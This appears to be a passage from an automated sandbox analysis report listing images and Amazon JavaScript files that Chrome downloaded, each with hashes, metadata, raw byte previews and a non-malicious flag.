                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):43
                                                                                                                                                                                                                                                                Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (24182), with no line terminators
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):24182
                                                                                                                                                                                                                                                                Entropy (8bit):5.315032386425423
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:Tvn/4G//y4q6IDB5yqO7RH3+o1EXt/CHoOP28BOzJjTbhYcG9LN1VV1XrLcMu3i1:T3XxL1awZgzJbhTGtZcMLzZ6gD23Uj
                                                                                                                                                                                                                                                                MD5:1D6DBC0AA536245BD1B35B964F94E01A
                                                                                                                                                                                                                                                                SHA1:A428BBA0D959C3D78F7DFE6307C5EDE5F1D8AA54
                                                                                                                                                                                                                                                                SHA-256:38D0C94882C0FA40B0030F9564BAE92D902F657DFB954CFA6B53B1BFA083ECFE
                                                                                                                                                                                                                                                                SHA-512:10E0D7982B54660203A46C5DF1B3DAB2C6EE6E379BE9903B11DDAA3ADA92DA355FC8C182B9D742AC5F4DBC71812891798D3F28028746D820A16016A1073E60F5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/41Qtra7lf+L.js
                                                                                                                                                                                                                                                                Preview:var Creative=function(t){var e={};function n(r){if(e[r])return e[r].exports;var o=e[r]={i:r,l:!1,exports:{}};return t[r].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(t,e,r){n.o(t,e)||Object.defineProperty(t,e,{configurable:!1,enumerable:!0,get:r})},n.r=function(t){Object.defineProperty(t,"__esModule",{value:!0})},n.n=function(t){var e=t&&t.__esModule?function(){return t.default}:function(){return t};return n.d(e,"a",e),e},n.o=function(t,e){return Object.prototype.hasOwnProperty.call(t,e)},n.p="",n(n.s=77)}([function(t,e,n){"use strict";n.r(e);var r="undefined"!=typeof MSFClient&&MSFClient;e.default=r},function(t,e,n){"use strict";var r=n(0),o="undefined"!=typeof navigator&&navigator,i=r.default&&r.default.getUserAgentInfo()||o&&o.userAgent;e.a=i},function(t,e,n){"use strict";n.r(e);var r=n(0),o=n(7),i=function(){if(r.default){var t=r.default.getDocumentCookie();return/\"av\":\"([.\d]*)\"/i.test(Object(o.a)(t,"amzn-app-ctxt"))}return!1}();e.default=i},f
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2963
                                                                                                                                                                                                                                                                Entropy (8bit):7.58345861846202
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0IdGuqjAfGeWnzujJ4Gm6gPsvrvyHM7mqm6aY5w1Pgq+JwVe94tItLDr3ArlN:To5jAueWzE4nRParvyVqCww1PR+Jwu4D
                                                                                                                                                                                                                                                                MD5:253B264B23B31BCC0C05CBAC2029757A
                                                                                                                                                                                                                                                                SHA1:FA462AE64FF181B099AA8F45847CE33B98509BF8
                                                                                                                                                                                                                                                                SHA-256:710350E8E1045F1539BB54EED150130C27233B23F4781299B64A30C631901753
                                                                                                                                                                                                                                                                SHA-512:0A293C167DC41284FDC3DD3919C1DE34102D23E30C3614BC3E32D91D06F88F53DE4F716555CB8AA31CF2EF30FA45F94556B8CF8437A0297D7F0B6E74C40D7DCE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................,.. K.u.O..Y....s_.e.o.......P........3..,.4D....Rs;].....V]X...{.u1.%..........%.)..CK......+._FwV6N=C..:|..P....h..:....:..npa...{..'...:...P....h..:.....N.<...[QU..Uc....y^.-.......=.-..)..G.|+.......'...z........4.m...T%....k........._k...z%......u.._..e1.'..$c(.Sm$1..u|.S..@......ik.L.)..y.|..Q.*.........Q.(....5.}AFV.f....>{.....eUUVU.^...%......o.1.0.51..H.^T+....i........G.(....5[]a.......k!.D.VVUU.UUY...<.C..@....E..q_'Y..>1.......j...>.........o...............6.ru.....s..t....t._........*.......................1@.0.. 23A.B.!#PQ.............Q..k5.D8.qP..CV.A7.l....U........ OA.UHu...F-Q0..r..S...0kZ..*T..e.....{.....T.D..T.I.....h.......Z..$.M...4^..Q.D..N.D........Ju}T..3.7p.v...3.7p.v...&`G....S...=....J...G...m.
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 240x220, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):8863
                                                                                                                                                                                                                                                                Entropy (8bit):7.933874073244524
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:2vQpqtbj/o9TJIuDm+mUqRWgyMjtnbgn4oEqjt:2vwqFo4DUBg3Fbk4o7jt
                                                                                                                                                                                                                                                                MD5:EC845C7DAAD5043DE9618244ED001C80
                                                                                                                                                                                                                                                                SHA1:38FA768CC5503B8304B241E9DCC48DA63AC8DEFA
                                                                                                                                                                                                                                                                SHA-256:D09ACDA9F0A36F1D534D4730EAEFD21AF24E553856C192B13D6CEAD9FC0B2E66
                                                                                                                                                                                                                                                                SHA-512:E680E423DA94DBFD78220EB60D47A9A7E2603DAEB4D002CADAA5E3787DA3FB3E24E1344E3367147E1E1364C4B237914F05EEF4452FBBE67382B06D0309837CC0
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://m.media-amazon.com/images/I/41tYpVlGR4L._SR240,220_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........2.............................................................../2.@I%^...yf...G.f..k6.x2..!NMwLj3.<....P.....z.C.z...zyv.I........ .E'f...b..3.9.A...:d.K.T.......4......{m..n.no...m...(......XARU-......G..*..I...|..N....=".C.D..;...jj..~...P.B.m....@.....'.Ds.3\V.r.`.HdUz%...Z..2.Yd....-t...SE.JC....MxQ.M,.T......x.9VG1d....W..I.G.a.M\.....+'}J.i....@...sQ.Y....L.p..Q....Y...0...E...|.1.X.$.E...D...i:....x@..J.5.....].U-.l....*_Jr.fs.....\..5.6.Lf.6.X.9..".x.}.V..4.J..y....pN{q.e..I?Pr~..Yw./#..r..W.|....$.,...0.Ixm."NV......'Z..x...e.O.\..7$X..U6........Q..<.....i.%..Bfe6.g.lA\U.r.V......W.VY..y_L.Qa.].C!.2.u.....5.{...o..;......c..........{k...k.:Y`.,........Kl.#.XaF..I.<@y....MW.r.Z3@......E ..........Z;.....o....I...-I.o....8Y..{#...,.Y...-8..X.6.h.S..z.....8+.q.\.@
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 242x200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):6232
                                                                                                                                                                                                                                                                Entropy (8bit):7.851307854013437
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:m7HqJs1Rvh5d2DG8FIaFM5lCF9+bA+fkQIilo:mH13UG8FIaG5lCX7QIilo
                                                                                                                                                                                                                                                                MD5:D7AA8AB13F8D91819094E394B4B42E52
                                                                                                                                                                                                                                                                SHA1:A2FB2B87D193E2167AE2C78EA06ABC68C7F06085
                                                                                                                                                                                                                                                                SHA-256:047BCB8E532C4413EB57A59E0EDACC8067001EA8CB5EAF50E7BB4805C1352997
                                                                                                                                                                                                                                                                SHA-512:1EB424DC07D1D1DAA803966DF53C55AF65FE6EB2A2A0B91DACD0C0DF5CAAD2D193F98A11338DF3BC62E1E564AB86E62342A546EBB145DA986038847E2049D0B1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/61f7uyPypDL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........5............................................................................N.Yj.3jIq..Y.}/...D...H.......4...y.:WVk.#%....Ts...#.{.h....<y=............m.4.{si.n...c7_7..5......C.i.Y.+.dp.l.Q...2.h........kyk.[T..<.M'.r./.n.`bPM..siC..c...W...u..Z...wLn..CU....L.De>.......P.I..|R.=.J.-{......=6.9.emD'..z.t#0........"...T......Ln.{)....g.G7...............;.KL./J...%.;..;..{..U.+]........u.._.T>..Z..Ra...k..a{..........v....]..+}^|m..p.. .....<.Q.u.sr<.........GT.,.R...9.#t._V.i..1=.qGM.}.NBl..........oO.h....r}+6&..GML....,mh..=........"Y]JI-p..VM.....z.............$.......................................!..12@."0. 3A#C.QBRa...........^...K.`gl.rWvIji:.V".........-...D..7..N.%..E.#*2&a.z.>.Y..=.`...X....2#*2-K..*..[?`.I..f.M~{...jFDeE.+J.QA$.pG..E.+..t`..+."'....|..GQ..
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x160, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):4891
                                                                                                                                                                                                                                                                Entropy (8bit):7.910123938330186
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TjCwexE2bm6OXbsmjVDkHQ4//vU5mkMKydpVjz1YmxWGQOzeYJ+y:qdC2bmDbskcQS/kpydL1HWGQOzec+y
                                                                                                                                                                                                                                                                MD5:ABCE695BE8650E234636A87206F6A539
                                                                                                                                                                                                                                                                SHA1:65EE55A5418B006E228C87FD9501FD3345FF3859
                                                                                                                                                                                                                                                                SHA-256:94CA9C9B0ED5C1ECD992AB13155DE6A5E74801DB4B667A4C18D6833925383C41
                                                                                                                                                                                                                                                                SHA-512:F2CC3B9CB0A404A908FDA0779A9171BDD94355A29DB68E8D0157BE7096A05AC90ED324BD8AFA1C772E2CEF60EDA1411D74AD5406B1BCFCC2DB6286F3BBDFE155
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:"https://images-eu.ssl-images-amazon.com/images/I/71owdQtLfJL._AC_UL225_SR225,160_.jpg"
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!1Qa."q......2ARr...Bc.....#34b......$................................................!"A123BQ............?..D@DD.D@DD.D@DBm....j......Q.9.0k7+Z._.1.f.\q*..4`..P.1.L.....;......MXy.8..........)s...8.J....Q.v}...A .?.Q.X~'..U.o li#....qZ...~y.U.o:.=....[..................................X..d.NW.....P=.IH.WyJq....2b=t.u.......r.E.."..|..2....,..A.MR..v>9......u.W.40..@.A...L...y.i.>zbH......ZW....'2....*..N.(...".S..f#KOU..4lp....................................)1.2....M....<sF.8.....w...K_....y...........6...)...B.fw....#...)...Z8X.X.M.A...B.Qy8q|.....a.n...._.].O9E..L....B.D~lS.}.U...N....{N.5.....O.d.S..9R.F......q..7-....................CA'P.>..........D>z..;GN:...F-....iH..{...S|..."._)J..'..x...eT^R.L.........
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):2170
                                                                                                                                                                                                                                                                Entropy (8bit):7.570999281272398
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:TT0r6Hr9/cwFxHT37u+tP2Ag9EfJQD8eIxIbr3PhpVuDIenXzC:TvrVcmxHnq9E4uGX3Z3Whne
                                                                                                                                                                                                                                                                MD5:E2E145F68FF332EFB98DD08440D07874
                                                                                                                                                                                                                                                                SHA1:CE07808F51600F704596840F4B8A6BBCBC4D1907
                                                                                                                                                                                                                                                                SHA-256:C56C07FBED866CD59D8C491637A2F4D9AD647916D2ACEA09D1DEF5613AF3E5F1
                                                                                                                                                                                                                                                                SHA-512:F83B1DE3CC7B99319C943E47B7D3523D734A6314A34798CF101DEB1D89C8B0EDF00168E4EFA48DD887CED7A5717D24749E9026E90B4824E68702B9C0C3BA17D5
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2024/img/Kitchen/XCM_CUTTLE_1715685_3745525_372x232_2X_en_AE._SY116_CB558011712_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!1Aq.#2Qa..."Rrt....3Cc...BDbds..................................................!.12...3q.Aa............?.....X....................................s}.u.....b...kH..W..m....+....a........Dc[.d.jF.....x......RN=...d....iU..:..U..j6|k......-...F.3q.K.<^.`.....Am..99...n+.s...e.."....J0......u^.k]".........Q.5..J.A6...d._L^b..W.N.>..Y...'W.[...-'..~.......y..[.k.&65......%...M..%*...j[>q.z...2.5P..f5...f4'].;.(.U{m7d.p...8..$.9...Ux......]...=...............8G..g...I....fh...=S.)<..}k.>n....uK.\.../..5...-.a)..W.=.....-...-..Vlp...-En...IF;>q.....Q3..;..D.....,|.yK8....*..-...6.Ou/.....{..oY<L....Vj.zm8;a....k..od.v.G..,|*eU.K.S..^..E..g.,}K..\.[..r.z./m....Mu?_q.R.C.W..L.........?. ...._....tg.r......uf...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x39, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):9461
                                                                                                                                                                                                                                                                Entropy (8bit):7.914567271701472
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:D2hRS1YzeKI34hEP58jb35gU6NyOGt7lUoNJqmn7DIWB:9KzrI34yB635ON5A7TJx7DjB
                                                                                                                                                                                                                                                                MD5:46407B5D65AABA2AD7B3633A80475EDE
                                                                                                                                                                                                                                                                SHA1:AE8129386B30ED4D22346D3AFB2C7963D50DA793
                                                                                                                                                                                                                                                                SHA-256:8AFFC3C8715D4CE3AC20C6637BE3920B2A84C3901913E6D8B88F83B2D18056C7
                                                                                                                                                                                                                                                                SHA-512:1524B465D5E5998523096BF8B1BF4B02097B37B9433D163F0351C91F8E42A1CDE211635B305BAFDB6211E4D4BF0B32AC4AB8F6F988384E50957436D601DC3886
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF......................................................................................................................................................'...............7...................................................................._...*.2...qR.D..ET.@.IAT..T.D.....D..@...u..d.2.%.,...D. 5Y..j.K5Y..,.d.2Y..d. 5Y.........?.$......B.-..o.E.mn..Q.?.+.(v..5s.@.kj..#..:_jh...gq.mo..E.K..,...!.j....0..x..J...4+..wpO[A.m........N.O.b-.".4-.1.+.)(.M......Vd.-k.eb..,O...6.....pA.~Our....$.u.\...z.0.c.Z..].%1BH..VO.\q...t.u.PF4D... .......,.g.)V78y9v.~}t...y....u.H..Y.../zb.64.r.<>.a....q.g'....i!..."{V....E.pl.UVe....&.}.X|...r...J[?.f....1H....{.....{.sMF.....o.{....A..Y/7.....&..2Md8w...7_F...|}..<z...3..x..a..Ns....>V..y.....$...s.2Q.....UY...S..b$.J*.J.BJ..d*.J$....J$@J..Es...%Y..,.d.d.%....d.P"Y...fK%Y..D.%....E...6.............................!%1Sd"23. 5AQ.#$4@BRTrt...........[........8.........._]Z....C..U.......(z..}}uJ>...._]N....G..S..k.R...
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, progressive, precision 8, 3000x1200, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):131724
                                                                                                                                                                                                                                                                Entropy (8bit):7.576128362840019
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:3072:4/iFj4TgUMnjPrLNaODX98JPUB4slQgTYznOIzqdLPGzJ:yiBzr2JP24kRunhzA+
                                                                                                                                                                                                                                                                MD5:6E5936C0C1EE219F0612FAB50EE1918F
                                                                                                                                                                                                                                                                SHA1:443F540C8F334F2B0B8C5257C220341C7ED30002
                                                                                                                                                                                                                                                                SHA-256:582968AEB5D1795386796E42B072BAE1A40F62EEFAC36B2EFF9522F18BD41865
                                                                                                                                                                                                                                                                SHA-512:6D989BE81D37715432F6670D9634C8C2B9983574CE9A3D77B261E9A90C03E86983600435EC665CD07F715F4DFEFF236CEA19BFE10435B100C2BD2A52D0599D50
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/I/71iPvoz6DQL._SX3000_.jpg
                                                                                                                                                                                                                                                                Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=1], baseline, precision 8, 1940x500, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):94765
                                                                                                                                                                                                                                                                Entropy (8bit):7.824630868878005
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:XElaBISdmlRU+Zk3lvkved+DAMlfPt0sjyZw9vA0ZIe8nKVUvb9Zm:AaBI9gfd+E8PuuUuxZlyZI
                                                                                                                                                                                                                                                                MD5:523FBB27B5717D668DB3E968E1D8E08F
                                                                                                                                                                                                                                                                SHA1:FD6B3457368C115A7B64E18F8A41E2803005AB68
                                                                                                                                                                                                                                                                SHA-256:4F5715CF25A08B349C1A01028C95FF3C670D9DA4289C92D8DF0920F0956F420E
                                                                                                                                                                                                                                                                SHA-512:F7BD222AD03570E1B9C30488D6BF061BE0059CF1C3EC2D5328585C45248F7893518FDD94FBC18975A72C26B45436B973E5FC8C742505D0DD692E72BEE211E88B
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://m.media-amazon.com/images/S/al-eu-726f4d26-7fdb/192b0df3-8002-4ca6-8283-ff7193353200.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF.............JExif..II*.......i.........................,...............Version 1.0.0....C....................................................................C......................................................................................................................b...........................!1.AQa.."2q.B....#Rbr...37su.......$6Cc45St....%DTUV.......&8.....(..................................A........................!1.2AQa.."q...BR....#3br....$......CSs.............?...r.........................................................................................................................................................................................................................................................................................@@@@A........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 118x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):8206
                                                                                                                                                                                                                                                                Entropy (8bit):7.962789794101196
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:mTNLVTuOUMAN8Sw1FdyjkxKEH2O39YoEbw7eLOoHpR895iiZJh:mTBVTuOUrN8Sw1FdGkxKEHT+dbw7eioU
                                                                                                                                                                                                                                                                MD5:6D0868091DDA3B515F63D534A924E419
                                                                                                                                                                                                                                                                SHA1:D615F995C1872C6C8BB3DB1ECF06CAF92C14DD6E
                                                                                                                                                                                                                                                                SHA-256:DC14CFE7159942187114F6DBC5926B2F2646A8278925CE37CB30A84626BCF598
                                                                                                                                                                                                                                                                SHA-512:BDC93C3B429E1D5BA42DF33ECAF061652C07833F0FC4931E5359D00C9ED7542F0C822EC363CAE2BB0ADBDCEB3F5693B54774FA5124C409EC93286B1219AE1A11
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........v.."..............................................................!.1.."AQ.aq...Rt......#2BTcs........35SUbr..$%4du..6CD....................................................!1A..."2Qaq...3BR....#4br.$%...............?...d3..+.L./q3-T.B.d"t.m._..y.$W#.KT..X...G.....h............'.C...(.......@%H....lee{s.....Ra.T.q..<=WRyE6....[..z.[...[..o./.=R....7.Rq.S]_......].".K.....v.&...x..3.Q...vH\."..4l..ln.q.{..=.G...G.^Q..JK.8.].z[.L.....9..<..I.<.8. ....{..~..TX....|........KVT.~b..K...S.h y.=..C..'5....%..C....F.Nlu.............S...$&#.3.H.C.m=...`B.yZ]..W..43G.d.G.N[.?..@..<....Zu>.].K.y..9..>cS..~`.a.......H#.4..?..*...........w..A;.X.7.'K3.D..,?.....y.$.No..U.....*....j.5/.b..4N"$wZ......+..y...W..<|.+3....5/.....BGu.:...|.....I..^.(..i..u.;n...:.sb...........j...{X0.......N.8.$lb.B.!q.UW.$fY.......
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                                                Size (bytes):3600
                                                                                                                                                                                                                                                                Entropy (8bit):7.890786194679337
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:TubK6gqdSQ7cy2Ki/jIgoQ+WWyUCRsTl7uQB:qe6gqB2Zr3Wy6xu0
                                                                                                                                                                                                                                                                MD5:730F9BF453F6D8D9E549D29D91504768
                                                                                                                                                                                                                                                                SHA1:481BCCF46BFEF31227ACE73953960A2177B202CF
                                                                                                                                                                                                                                                                SHA-256:0B7D12BF279A942F5D966963A04549BA48DB2FE3A3F59FDF68CFD9C3D594A2F1
                                                                                                                                                                                                                                                                SHA-512:28CD7576E35324C1C37CEAE2EF42A1ED55D26A2366DC097A18C99C901B7CE15DDE7A9B5B628FFFC5608E99EE69C1A6D21B3FECFBBCDE8756BA936DEA9A9B2CBF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                URL:https://images-eu.ssl-images-amazon.com/images/G/39/electronics/store/kamja/WebQC/2021/Electronics/Feb_TVs_1x._SY116_CB659040198_.jpg
                                                                                                                                                                                                                                                                Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t....".................................................................!.1Aaq"2Q....BTr.......4RUb....#$D...Cc....................................................!1..2AR.."BQ.CSqab...............?...QE.QE..E.P..Q@.QE.QE..E.P..Q@.QE.T...q.i.......Q:.^....5>.w....5=ST...1......QS*..ec...F...56..1.S..%.nR.zH...\..(=$.....J..m....m.... S...s........)N.........0KG...A#x!..<....5l....T....~...'_.`.)[.zD...M...PSB.....20.......c.....u..E..y.|..}u....i\M.^....'.L........D%.^7.lw..6...'.G.3h.\}.{..0Q...k........!..L./..d..f:E...|}.~.37..t.w...8...1..$k..x.(...H.B...e..L..;.nE)./.N.C..Z.u$>.o..k..i....^.of..3.;...@j....=^...5ti.z...M....1h..E\0d.....=...6~E/.J....B1..V..Z}Y..2....U...L....CK...'Rp..S*...9......0..[TW.+...Y..-...W(AJx....\..G......r.(.......*s...D.a....;.v..(,..`..K.&.&.t.|R.0.X........F)
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (821)
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):119435
                                                                                                                                                                                                                                                                Entropy (8bit):5.310726578286396
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:1536:zdYvqPLlRf9SVENCDQ6/vZMYAtCYw/dU4+ruUrrXVzOetY+YCG92G:evef9SVENCk6/8CYwS4urXVzVNG
                                                                                                                                                                                                                                                                MD5:47B144E02567BC5C6BC2F7E048E8F26E
                                                                                                                                                                                                                                                                SHA1:9BA12ECD4B5C1E79C8EFB4B132A7E785C4745EE7
                                                                                                                                                                                                                                                                SHA-256:6EB4B1AB4FFBCB4172E4A0F3DDBD68F8B896671496820AD5749D21204A34C69A
                                                                                                                                                                                                                                                                SHA-512:87843E2807D4A3DB2D63F9A2F6FE82AAAABBC8A62141DC47A919865844B2421C382007266069BBCF69ABC7606F87B0C62ACC42CC41A8718CE1C99EE2C2B948DB
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:(function(f){var g=window.AmazonUIPageJS||window.P,h=g._namespace||g.attributeErrors,e=h?h("JQueryUI_Core_AUIBuild",""):g;e.guardFatal?e.guardFatal(f)(e,window):e.execute(function(){f(e,window)})})(function(f,g,h){f.when("jQuery").register("jQueryUI-core",function(e){(function(b,e){function f(a,c){var d=a.nodeName.toLowerCase();if("area"===d){c=a.parentNode;d=c.name;if(!a.href||!d||"map"!==c.nodeName.toLowerCase())return!1;a=b("img[usemap\x3d#"+d+"]")[0];return!!a&&g(a)}return(/input|select|textarea|button|object/.test(d)?.!a.disabled:"a"===d?a.href||c:c)&&g(a)}function g(a){return b.expr.filters.visible(a)&&!b(a).parents().addBack().filter(function(){return"hidden"===b.css(this,"visibility")}).length}var h=0,k=/^ui-id-\d+$/;b.ui=b.ui||{};b.extend(b.ui,{version:"1.10.3",keyCode:{BACKSPACE:8,COMMA:188,DELETE:46,DOWN:40,END:35,ENTER:13,ESCAPE:27,HOME:36,LEFT:37,NUMPAD_ADD:107,NUMPAD_DECIMAL:110,NUMPAD_DIVIDE:111,NUMPAD_ENTER:108,NUMPAD_MULTIPLY:106,NUMPAD_SUBTRACT:109,PAGE_DOWN:34,PAGE_U
                                                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 200x200, components 3
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):10700
                                                                                                                                                                                                                                                                Entropy (8bit):7.9571926894155265
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:192:LbFOKlbiBhQqoBgJ/4BSYeH1y+Er1o5WB0PnX1QbYj0QXvGzl9LG:LbTRO3d/D1y/r25WB0PXqYZfu9q
                                                                                                                                                                                                                                                                MD5:CD580B4FD5D2EA900FD8908731055C84
                                                                                                                                                                                                                                                                SHA1:EBF563B20BC9ACF94198EE26847274C490410262
